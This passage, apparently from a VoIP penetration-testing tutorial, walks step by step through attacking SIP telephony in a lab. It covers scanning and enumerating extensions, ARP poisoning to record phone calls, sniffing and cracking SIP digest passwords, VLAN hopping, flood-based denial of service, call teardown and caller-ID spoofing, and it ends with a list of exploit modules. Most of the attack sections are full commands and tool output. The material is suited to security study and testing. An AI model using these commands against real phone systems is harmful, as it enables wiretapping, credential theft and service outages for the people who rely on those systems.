NOTICE: test_accept: "Accept: application/sdp" NOTICE: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY" NOTICE: test_supported: "Supported: replaces" NOTICE: test_via: transport capitalization: 2 NOTICE: test_via: "branch;alias;received;rport" NOTICE: test_via: Please add new cmpstr NOTICE: test_via: transport capitalization: 2 192.168.1.104: ICMP reachable, SIP enabled best guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579 FINGERPRINT information: newmethod=501 accept_class=2 allow_class=201 supported_class=8 via_class=2 hoe_class=ignore options=200 brokenfromto=404 prack=481 ping=501 invite=200 User-Agent: Asterisk PBX 1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
Another useful feature of SMAP is the d argument which enables debug output for verbosity try to use the o along with it to view the fingerprinting process in details.
DEBUG: local IP: 212.235.66.182 DEBUG: local IP: 212.235.66.182 DEBUG: bind() successful
DEBUG: RAW socket open DEBUG: moving 1 from S_START to S_PING DEBUG: ICMP error Echo Reply DEBUG: 192.168.1.104/1 request: SIP OPTIONS request (valid) DEBUG: response belongs to task 1 (192.168.1.104) DEBUG: ACK: ACK sip:localhost SIP/2.0 Via: SIP/2.0/UDP 212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168. 1.105;rport=5060 From: ;tag=6b9ae50e67345d3b To: ;tag=as14262fec Call-ID: 1992951560@212.235.66.182 CSeq: 23915 ACK Content-Length: 0 User-Agent: smap 0.6.0 --- end of ACK-192.168.1.104: ICMP reachable, SIP enabled DEBUG: destroying task 1
SIPSAK
SIPSAK is used for testing SIP enabled applications and devices using the OPTION request method only. We can use it to fingerprint and enumeration. You wont find sipsak in the /pentest/voip/ directory; you can execute it from any location by simply typing sipsak.
root@bt:~# sipsak sipsak 0.9.6 by Nils Ohlmeier Copyright (C) 2002-2004 FhG Fokus Copyright (C) 2004-2005 Nils Ohlmeier report bugs to nils@sipsak.org shoot : trace : usrloc : z NUMBER] sipsak [-f FILE] [-L] -s SIPURI sipsak -T -s SIPURI sipsak -U [-I|M] [-b NUMBER] [-e NUMBER] [-x NUMBER] [-s SIPURI
-I|M [-b NUMBER] [-e NUMBER] -s SIPURI -U [-C SIPURI] [-x NUMBER] -s SIPURI -M [-B STRING] [-O STRING] [-c SIPURI] -s SIPURI -F [-e NUMBER] -s SIPURI -R [-t NUMBER] -s SIPURI
additional parameter in every mode: [-a PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NUMBER] [n] [-N] [-r PORT] [-v] [-V] [-w] -h -V -f FILE send -L -s SIPURI -T -U -I -M -C SIPURI -b NUMBER (default: 0) -e NUMBER name -o NUMBER -x NUMBER -z NUMBER -F -R -t NUMBER random mode -l -r -p -H -m -n -i -a PORT PORT HOSTNAME HOSTNAME NUMBER displays this help message prints version string only the file which contains the SIP message to use - for standard input de-activate CR (\r) insertion in files the destination server uri in form sip:[user@]servername[:port] activates the traceroute mode activates the usrloc mode simulates a successful calls with itself sends messages to itself use the given uri as Contact in REGISTER the starting number appendix to the user name the ending numer of the appendix to the user sleep number ms before sending next request the expires header field value (default: 15) activates randomly removing of user bindings activates the flood mode activates the random modues (dangerous) the maximum number of trashed character in (default: request length) the local port to use (default: any) the remote port to use (default: 5060) request target (outbound proxy) overwrites the local hostname in all headers the value for the max-forwards header field use FQDN instead of IPs in the Via-Line deactivate the insertion of a Via-Line password for authentication (if omitted password="") Authentication username ignore redirects each v produces more verbosity (max. 3)
PASSWORD
-u STRING -d -v
-w -g STRING -G -N -q STRING error -W -B -O -P -A -S -c -D NUMBER STRING STRING NUMBER NUMBER SIPURI NUMBER
extract IP from the warning in reply replacement for a special mark in the message activates replacement of variables returns exit codes Nagios compliant search for a RegExp in replies and return on failure return Nagios warning if retrans > number send a message with string as body Content-Disposition value Number of processes to start number of test runs and print just timings use same port for receiving and sending use the given uri as From in MESSAGE timeout multiplier for INVITE transactions and reliable transports (default: 64) specify transport to be used adds additional headers to the request
-E STRING -j STRING
Here is an example for using sipsak to fingerprint a sip enabled device We can see in the result that the device we queried is an Audiocodes MP-114 FXS gateway.
root@bt:~# sipsak -vv -s sip:192.168.1.221 message received: SIP/2.0 200 OK Via: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias From: sip:sipsak@127.0.1.1:51601;tag=97ac9e5 To: sip:192.168.1.221;tag=1c1785761661 Call-ID: 159042021@127.0.1.1 CSeq: 1 OPTIONS Contact: Supported: em,100rel,timer,replaces,path,resource-priority Allow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SU BSCRIBE,UPDATE Server: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005 X-Resources: telchs=4/0;mediachs=0/0 Accept: application/sdp, application/simple-message-summary, message/sipfrag Content-Type: application/sdp
Content-Length: 343 v=0 o=AudiocodesGW 1785763980 1785763858 IN IP4 192.168.1.221 s=Phone-Call c=IN IP4 192.168.1.221 t=0 0 m=audio 6000 RTP/AVP 18 8 0 127 a=rtpmap:18 G729/8000 a=fmtp:18 annexb=no a=rtpmap:8 PCMA/8000 a=rtpmap:0 PCMU/8000 a=rtpmap:127 telephone-event/8000 a=fmtp:127 0-15 a=ptime:20 a=sendrecv a=rtcp:6001 IN IP4 192.168.1.221
SIPScan
Sip-scan is a simple scanner for sip enabled hosts it can scan a single host or an entire subnet.
Sip-scan usage:
root@bt:/pentest/voip/sipscan# ./sip-scan --help ./sip-scan version [unknown] calling Getopt::Std::getopts (version 1.05), running under Perl version 5.10.0. Usage: sip-scan [options] -v -i -p -l -d 'p' Be verbose. Interface/IP for SIP-headers (default: IP from ppp0) remote port to scan. (default: 5060) local origin of packets. (default: 5060) Wait n ms after each sent packet (default: 50ms) or if given, send n packets per second (default: 20)
-w n
Scanning a subnet:
root@bt:/pentest/voip/sipscan# ./sip-scan -i eth0 192.168.1.1-254 192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.22: Asterisk PBX 192.168.1.104: Asterisk PBX 192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055 192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35 192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27 192.168.1.219: "Exelmind Call-Control Switch (CCS)" 192.168.1.248: MailVision HostLynx/2.1 'GA'
SVMAP
SVMAP is a part of a suite of tools called SIPVicious and its my favorite scanner of choice It can be used to scan identify and fingerprint a single IP or a range of IP addresses. Svmap allows specifying the request method which is being used for scanning, the default method is OPTIONS, it offers debug and verbosity options and even allows scanning the SRV records for SIP on the destination domain. You can use the ./svmap h in order to view all the available arguments
root@bt:/pentest/voip/sipvicious# ./svmap.py Usage: svmap.py [options] host1 host2 hostrange examples: svmap.py 10.0.0.1-10.0.0.255 \ > 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \ > 1.1.1.1-20 1.1.2-20.* 4.1.*.* svmap.py -s session1 --randomize 10.0.0.1/8 svmap.py --resume session1 -v svmap.py -p5060-5062 10.0.0.3-20 -m INVITE
Scanning an IP range:
root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 | SIP Device | User Agent | Fingerprint | ---------------------------------------------------| 192.168.1.104:5060 | Asterisk PBX | disabled | | 192.168.1.103:5060 | Twinkle/1.4.2 | disabled |
Extensions Enumeration
Extension enumeration can aid an attacker by finding valid extensions on a VoIP system which later can lead to a brute force attack on the SIP accounts. Extension enumeration works by examining errors returned by a sip requests methods like REGISTER, OPTIONS and INVITE
Svwar
Svwar is also a tool from the sipvicious suite allows to enumerate extensions by using a range of extensions or using a dictionary file svwar supports all the of the three extension enumeration methods as mentioned above, the default method for enumeration is REGISTER. Usage:
root@bt:/pentest/voip/sipvicious# ./svwar.py Usage: svwar.py [options] target examples: svwar.py -e100-999 10.0.0.1 svwar.py -d dictionary.txt 10.0.0.2
Example:
root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 | Extension | Authentication | -----------------------------| 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth |
Svwar has identified all the extensions Ive created on my Trixbox server. You can specify another sip method by using the m argument, you can also add t v or vv for verbosity.
root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 -m INVITE -v INFO:TakeASip:trying to get self ip .. might take a while INFO:root:start your engines INFO:TakeASip:Ok SIP device found INFO:TakeASip:extension '200' exists - requires authentication INFO:TakeASip:extension '201' exists - requires authentication -----Edit---INFO:TakeASip:extension '203' exists - requires authentication INFO:TakeASip:extension '303' exists - requires authentication INFO:TakeASip:extension '303' exists - requires authentication INFO:TakeASip:extension '305' exists - requires authentication INFO:root:we have 6 extensions | Extension | Authentication | -----------------------------| 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth | INFO:root:Total time: 0:00:21.944731
Enumiax
Enumiax is used to enumerate Asterisk Exchange protocol usernames. It allows for a dictionary attack or a sequential Username Guessing
root@bt:/pentest/voip/enumiax# ./enumiax enumIAX 1.0 Dustin D. Trammell Usage: enumiax [options] target options: -d Dictionary attack using file -i Interval for auto-save (# of operations, default 1000) -m # Minimum username length (in characters) -M # Maximum username length (in characters) -r # Rate-limit calls (in microseconds) -s Read session state from state file
-v verbosity) -V -h
Increase verbosity (repeat for additional Print version information and exit Print help/usage information and exit
root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104 enumIAX 1.0 Dustin D. Trammell Target Aquired: 192.168.1.104 Connecting to 192.168.1.104 via udp on port 4569... Starting enum process at: Sat Feb 5 13:04:18 2011 Now working on 3 character usernames... ################################# Trying username: "000" ################################# Trying username: "001" ################################# Trying username: "002" ################################# Trying username: "003" ################################# Trying username: "004" ################################# Trying username: "005" ################################# Trying username: "006" ################################# Trying username: "007" ################################# Trying username: "008" ################################# ... root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104 enumIAX 1.0 Dustin D. Trammell Target Aquired: 192.168.1.104 Connecting to 192.168.1.104 via udp on port 4569... Starting enum process at: Sat Feb 5 13:02:39 2011 ################################# Trying username: "guest" ################################# Trying username: "iaxtel" ################################# Trying username: "iaxtel2" #################################
Trying username: "100" ################################# Trying username: "101" ################################# Trying username: "200" ################################# Trying username: "201" ################################# Trying username: "202" ################################# Trying username: "203" End of dictionary file reached, exiting.
Capturing SIP authentication (we will later discuss this topic in the attacking authentication section). Eavesdropping users phone calls. For demonstration purposes we will use the following scenario:
For this attack vector we will need to perform a Man in The Middle Attack which will require the following steps:
just invoke it from anywhere by typing: arpspoof Before we can use arpspoof we will need to enable IP forwarding:
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# arpspoof Version: 2.4 Usage: arpspoof [-i interface] [-t target] host
We will let our Arp poisoning run in the background while performing a capture using Wireshark.
Now lets start capturing some traffic While sniffing for traffic User B has launched the X-Lite soft phone on his desktop computer and dialed to user A extension 200.
Wireshark has captured some traffic, after a while I have stopped the capture process and saved the sessions into a file called sip.pcap.
We can see that we have captured the SIP traffic but for this section we are more interested in the RTP traffic because it contains the actual conversation data.
Wireshark has a pretty cool feature to decode captured VoIP calls data into playable audio format You can find this feature under the Statistics -> VoIP Calls menu.
VoIPong
VoIPong is a utility which detects all Voice over IP calls on a pipeline, and for those which are G711 encoded, dumps actual conversation to separate wave files. It supports SIP, H323, Cisco's Skinny Client Protocol, RTP and RTCP. VoIPong is located in Backtrack /pentest/voip/voipong directory Before we can use VoIPong we will need to make some changes to the voipong.conf file:
root@bt:/pentest/voip/voipong# nano etc/voipong.conf soxpath = /usr/bin/sox networksfile = /pentest/voip/voipong/etc/voipongnets outdir = /pentest/voip/voipong/output/ device = eth0 # your network interface card name
Once VoIPong detects a phone call it will start capture it once it finish VoIPong will stop the capture process and will render it to a playable wave file. All conversation will be saved into the /pentest/voip/voipong/output folder
Vomit
Vomit converts a Cisco IP phone RTP conversation into a wave file that can be played with ordinary sound players. Vomit requires a tcpdump output file. In order to get vomit up and running we will need to download and install waveplay Get it here: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/wavep lay-20010924.tar.gz.5731.html
root@bt:~# tar -xzvf waveplay-20010924.tar.gz waveplay-20010924/ waveplay-20010924/Makefile waveplay-20010924/waveplay.c waveplay-20010924/waveplay.ja.1 waveplay-20010924/wavefmt.h waveplay-20010924/README waveplay-20010924/waveplay.1 waveplay-20010924/README.jp root@bt:~# cd waveplay-20010924 root@bt:~/waveplay-20010924# make cc -c -o waveplay.o waveplay.c cc waveplay.o -o waveplay root@bt:~/waveplay-20010924# cp waveplay /usr/bin/ root@bt:/pentest/voip/vomit# ./vomit-r sip.dump | waveplay -S8000 -B16 -C1
UCsniff
UCSniff is a VoIP & IP Video Security Assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP Video owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping. UCSniff supports Arp poisoning, VLAN Hopping, VLAN Discovery via CDP, it has a sniffer capabilities and more I consider it as an all in one eavesdropping tool. Lets take a look at some usage examples: UCSniff can operate in 2 modes
Monitor mode Should be used on a shared media where the IP phones connected to i.e : a HUB, wireless access point, it can be also be used in a switched environment by setting up a SPAN sessions on a Cisco switch.
Man in the middle mode This mode has 2 additional modes which are
Learning Mode Targeted Mode Preparing UCSniff so we can run it from any location in backtrack:
root@bt:/tmp# cd /pentest/voip/ucsniff/ root@bt:/pentest/voip/ucsniff# ./configure root@bt:/pentest/voip/ucsniff# make root@bt:/pentest/voip/ucsniff# make install
root@bt:/tmp/ucsniff# ucsniff -i eth0 -M UCSniff 2.1 starting Running in Monitor Mode File directory-users.txt can't be opened for reading in working directory File targets.txt can't be opened for reading in working directory Listening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0 Starting Unified sniffing... Warning: Please ensure that you hit 'q' when you are finished with this program. Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS. SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118) SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '200Calling-201-5:2:7-3-both.wav' SIP Call ended. Conversation recorded in file '200Calling-201-5:2:8-2-both.wav' Closing text interface... Unified sniffing was stopped.
We can stop the sessions by pressing on the Q key. Several files were created by UCSniff: Log files Contains detailed information about sip transactions Pcap files capture file which can be viewed in wireshark audio wav files conversation audio files
root@bt:/tmp/ucsniff# ls -l total 376 -rw-r--r-- 1 root root 40854 Calling-201-5:2:7-3-both.wav -rw-r--r-- 1 root root 115818 Calling-201-5:2:7-3.pcap -rw-r--r-- 1 root root 46294 Calling-201-5:2:8-2-both.wav -rw-r--r-- 1 root root 103940 Calling-201-5:2:8-2.pcap -rw-r--r-- 1 root root 278 call_detail_log -rw-r--r-- 1 root root 317 -rw-r--r-- 1 root root 10063 -rw-r--r-- 1 root root 39073 sipdump.pcap -rw-r--r-- 1 root root 0
5 05:02 2005 05:02 2005 05:02 2005 05:02 2005 05:02 5 05:02 call_log 5 05:02 sip.log 5 05:02 5 05:01 skinny_log
root@bt:/tmp/ucsniff# ucsniff -i eth0 // // UCSniff 2.1 starting Listening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0 Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Mapped new target entry: (IP: 192.168.1.118) --> extension 201 and name:Mapped new target entry: (IP: 192.168.1.104) --> extension 200 and name: SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104) SIP Call ended. Conversation recorded in file '201Calling-200-5:13:4-2-both.wav' Closing text interface... ARP poisoner deactivated. RE-ARPing the victims... Unified sniffing was stopped.
If we take a look at UCSniff log files we can see the discovered targets used in the attack.
manually to the targets.txt file in the following format: x.x.x.x,extension,,sip 192.168.1.118,201,,sip Or use learning mode to auto discover hosts
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T UCSniff 2.1 starting File targets.txt can't be opened for reading in working directory No targets have been previously discovered in Targets file, targets.txt Please run UCSniff in learning mode, or manually edit targets.txt
Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode:
root@bt:/tmp/ucsniff# ucsniff -i eth0 -T UCSniff 2.1 starting Parsed 2 entries in Targets file, targets.txt UCSniff running in target mode. Parsed 2 previously discovered targets Please select a Targeted Eavesdropping Mode: 1. User Description: Eavesdrop on all calls to or from a particular endpoint. 2. Conversation Description: Eavesdrop on bi-directional conversation flows between two selected endpoints. Please select option (1) or (2):
Selecting "User" tells the tool to intercept all traffic between the one Target, and the rest of the network.
In "Conversation", two endpoints are selected and the network is ARP Poisoned to only intercept the traffic between those two users.
UCSniff includes more useful tools and attacks modes like VLAN hopping (using ACE) which will be discussed later.
Xplico
Although Xplico is not in the Backtrack voip tools directory, it is a very useful tool for capturing SIP and RTP traffic (among other protocols). Xplico can be found in the Backtrack -> Digital Forensics -> Forensic Analysis menu
In case it is not present on your Backtrack installation you can simply install it by issuing the following command:
root@bt:~# apt-get install xplico
Xplico can be used to capture live traffic or import a Wireshark PCAP capture file. Either way Xplico will decode the captured packets and will assemble them into the appropriate format In our case it will be SIP and RTP. After executing Xplico you will be asked to login, the default username and password are: xplico
We will be asked to choose between a live capture or to import a PCAP file In this example we will use Xplico to perform a live capture (we will Arp poison our targets in the background using arpspoof). Now we will have to choose our case and create a new session
By choosing our newly created session we will see our main statistics page with the option to choose our network adapter and start/stop the capture process.
root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txt SIPdump 0.3 ( MaJoMu | www.codito.de ) --------------------------------------* Using dev 'eth0' for sniffing * Starting to sniff with packet filter 'tcp or udp or vlan' * Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200') * Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200') * Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
root@bt:/pentest/voip/sipcrack# ./sipdump -p /root/registration.pcap auth.txt SIPdump 0.3 ( MaJoMu | www.codito.de ) --------------------------------------* Using pcap file '/root/registration.pcap' for sniffing * Starting to sniff with packet filter 'tcp or udp or vlan' * Dumped login from 192.168.1.104 -> 192.168.1.101 (User: '200') * Exiting, sniffed 1 logins
SIPDump will write the authentication challenge response to the specified file which looks as follows:
Attacking Authentication
SIP can be susceptible to 2 types of authentication attacks, before we take a look at these attacks types lets understand hows a SIP registration and authentication process takes place. SIP uses a digest authentication which is a mechanism that the HTTP protocol uses and known as HTTP digest. Because SIP is an ASCII based protocol the authentication details are hashed in order to prevent them to transport in clear text. When a SIP client (User Agent) wants to authenticate with a SIP server, the server generates and sends a digest challenge to the client, it contains the following parameters:
Realm - used to identify credentials within as SIP message, usually it is the sip domain. Nonce - this is an md5 unique string which is generated by the server for each registration
request it is made from a time stamp and a secret phrase to ensure it has a limited lifetime and could be not be used again. Once the client receives the digest challenge and the user enters his credentials the client uses the nonce to generate a digest response and sends it back to the server.
With that said, lets try to crack the digest response in order to obtain a valid SIP account password.
SIPCrack Usage:
root@bt:/pentest/voip/sipcrack# ./sipcrack SIPcrack 0.3 ( MaJoMu | www.codito.de ) ---------------------------------------Usage: sipcrack [OPTIONS] [ -s | -w ] = file containing logins sniffed by SIPdump Options: -s = use stdin for passwords
= file containing all passwords = print cracking process every n (ATTENTION: slows down
or -s has to be given
Dictionary attack
Backtrack provides some basic dictionaries which are located in:
root@bt:/pentest/passwords/wordlists
But for the purpose of this article I will use another grate tool in backtrack called Crunch which is used to create custom dictionaries. Lets use crunch to create a six characters numeric dictionary Crunch is located in:
root@bt:/pentest/passwords/crunch#
Crunch Usage:
usage: crunch [-f /path/to/charset.lst charsetname] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
root@bt:/pentest/passwords/crunch# ./crunch 6 6 f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txt Crunch will now generate 7000000 bytes of data Crunch will now generate 6 MB of data Crunch will now generate 0 GB of data 100%
We will use a previously captured sip credentials stored by SIPDump in the auth.txt file ans sipass.txt as the dictionary (which we created using crunch) Cracking the Digest Response:
root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txt SIPcrack 0.3 ( MaJoMu | www.codito.de ) ---------------------------------------* Found Accounts: Num Server Client User Hash|Password 1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd * Select which entry to crack (1 - 1): 1 * Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f * Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd') * Loaded wordlist: 'sipass.txt'
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd') * Tried 123457 passwords in 0 seconds * Found password: '123456' * Updating dump file 'auth.txt'... done
Generating passwords using john and redirecting the output to our FIFO file, for this example we will generate up to 6 digits only.
root@bt:~# john [*] This script will take you to /pentest/passwords/jtr/ [*] From there, run ./john root@bt:/pentest/passwords/jtr# ./john -incremental=digits stdout=6 > /tmp/sipcrack
root@bt:/pentest/voip/sipcrack# ./sipcrack -w /tmp/sipcrack auth.txt SIPcrack 0.3 ( MaJoMu | www.codito.de ) ---------------------------------------* Found Accounts:
Num Server Client User Hash|Password 1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968 * Select which entry to crack (1 - 1): 1 * Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f * Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968') * Loaded wordlist: '/tmp/sipcrack' * Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968') * Tried 3 passwords in 0 seconds * Found password: '123456' * Updating dump file 'auth.txt'... done
root@bt:/pentest/voip/sipvicious# ./svcrack.py u200 -r100000-999999 192.168.1.104 | Extension | Password | -----------------------| 200 | 123456 |
VLAN Hopping
Usually VoIP traffic is connected to a dedicated VLAN (Virtual LAN) as we saw in the topologies section. This means that we cannot intercept the VoIP traffic by sniffing and Arp poisoning. The reason for that is that a VLAN is like a separate network, it has its own broadcast domain and different IP range than the data network. VLAN hopping is a way to hop to another VLAN, lucky for us Backtrack includes the necessary tools to perform this attack. One common topology is where the IP Phone has a built-in Internal Switch, usually the pc is plugged into the phone pc socket and the phone is connected from its lan/sw socket to the network switch as follows:
A typical CISCO switch port configuration for VoIP will look something like:
Switch# conf t Enter configuration commands, one per line. End with CNTL/Z. Switch(config)#interface fastEthernet 0/1 Switch(config-if)#switchport mode access Switch(config-if)#switchport access vlan 10 Switch(config-if)#switchport voice vlan 20
The IP phone will be configured with the appropriate VLAN ID (20) and the PC data traffic will flow through VLAN 10. Before we begin hopping around we will have to enable support for the 802.1q protocol in Backtrack by typing:
VoIP Hopper
VoIP hopper is used to hop into voice Vlan by behaving like an IP phone; it supports specific switches and supports some IP phones models. It currently supports the brands like: Cisco, Avaya and Nortel. VoIP hopper was designed to run under Backtrack Linux and currently has the following features: DHCP Client, CDP Generator, MAC Address Spoofing and VLAN hopping. Voiphopper usage:
root@bt:/pentest/voip/voiphopper# ./voiphopper voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID> Please specify 1 base option mode: CDP Sniff Mode (-c 0) Example: voiphopper -i eth0 -c 0 CDP Spoof Mode with custom packet (-c 1): -D (Device ID) -P (Port ID) -C (Capabilities) -L (Platform) -S (Software) -U (Duplex) Example: voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1 CDP Spoof Mode with pre-made packet (-c 2) Example: voiphopper -i eth0 -c 2 Avaya DHCP Option Mode (-a): Example: voiphopper -i eth0 -a VLAN Hop Mode (-v VLAN ID): Example: voiphopper -i eth0 -v 200 Nortel DHCP Option Mode (-n): Example: voiphopper -i eth0 -n
VoIP Hopper provides many modes for attack please use the h for detailed information.
Lets take a look at an example of sniffing for CDP and run a VLAN Hop into the Voice VLAN in a Cisco environment. Run VoIP Hopper on the Ethernet interface, in the following way:
VoIP Hopper also allows one to VLAN Hop to an arbitrary VLAN, without sniffing for CDP. If you already know the Voice VLAN ID or would like to VLAN Hop into another VLAN just specify the vlan id.
root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20 VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2 Added VLAN 20 to Interface eth0 Attempting dhcp request for new interface eth0.20 eth0.20 Link encap:Ethernet HWaddr 00:0c:29:84:98:b2 inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:9 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:2274 (2.2 KB)
ACE
ACE is another tool for vlan hopping very similar to Voiphopper in usage and include an option to discover also TFTP servers (configuration servers). ACE Usage:
root@bt:/pentest/voip/ace# ./ace ACE v1.0: Automated Corporate (Data) Enumerator Usage: ace [-i interface] [ -m mac address ] [ -t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode ] -i <interface> (Mandatory) Interface for sniffing/sending packets -m <mac address> (Mandatory) MAC address of the victim IP phone -t <tftp server ip> (Optional) tftp server ip address -c <cdp mode 0|1 > (Optional) 0 CDP sniff mode, 1 CDP spoof mode -v <voice vlan id> (Optional) Enter the voice vlan ID -r <vlan interface> (Optional) Removes the VLAN interface -d (Optional) Verbose | debug mode
You can manually add a vlan hop or use its discovery feature
Mode to auto-discover voice vlan ID in the listening mode for CDP Example: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E Mode to auto-discover voice vlan ID in the spoofing mode for CDP Example: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E
It doesnt matter if you used voiphopper or ace you can now intercept VoIP traffic with tools like ucsniff by specifying you newly created interface. For example:
Denial Of Service
A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Lets take a quick overview of the tools available in Backtrack
Inviteflood
This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood inviteflood - Version 2.0 June 09, 2006 Usage: Mandatory interface (e.g. eth0) target user (e.g. "" or john.doe or 5000 or "1+210-555-1212") target domain (e.g. enterprise.com or an IPv4 address) IPv4 addr of flood target (ddd.ddd.ddd.ddd) flood stage (i.e. number of packets) Optional -a flood tool "From:" alias (e.g. jane.doe) -i IPv4 source IP address [default is IP address of interface] -S srcPort (0 - 65535) [default is wellknown discard port 9]
-D destPort (0 - 65535) [default is wellknown SIP port 5060] -l lineString line used by SNOM [default is blank] -s sleep time btwn INVITE msgs (usec) -h help - print this usage -v verbose output mode
As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy.
Rtpflood
Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to
Iaxflood
IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood usage: ./iaxflood sourcename destinationname numpackets
Teardown
Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag
First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value.
SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192 .168.1.105;rport=5060 From: "200" ;tag=hcykd To: "200" ;tag=as644fe807 Call-ID: jwtgckolqnoylqf@backtrack CSeq: 134 REGISTER User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Supported: replaces
Expires: 3600 Contact: ;expires=3600 Date: Tue, 01 Feb 2011 17:55:42 GMT Content-Length: 0
Spoofing Caller ID
There are several methods for spoofing Caller ID which we wont discuss here because it requires a different set of tools and equipment which are irrelevant to this article
purpose. Spoofing Caller ID in SIP is fairly easy, you just need to change the SIP request INVITE from header.
INVITE sip:@127.0.0.1 SIP/2.0 To: <sip:192.168.1.104> Via: SIP/2.0/UDP 192.168.1.104 From: "Evil Hacker" Call-ID: 14810.0.1.45 CSeq: 1 INVITE Max-Forwards: 20 Contact: <sip:127.0.0.1>
We will take a look at a tool we have already discussed called Inviteflood which can be used to send spoofed invite requests.
Auxiliaries
scanner/sip/enumerator - SIP Username Enumerator (UDP) scanner/sip/enumerator_tcp - SIP Username Enumerator (TCP) scanner/sip/options - SIP Endpoint Scanner (UDP)scanner/sip/options_tcp - SIP Endpoint Scanner (TCP) voip/sip_invite_spoof - SIP Invite Spoof
Exploits
windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq Buffer Overflow windows/sip/sipxezphone_cseq SIPfoundry sipXezPhone 0.35a CSeq Field Overflow windows/sip/sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow unix/webapp/trixbox_langchoice - Trixbox langChoice PHP Local File Inclusion
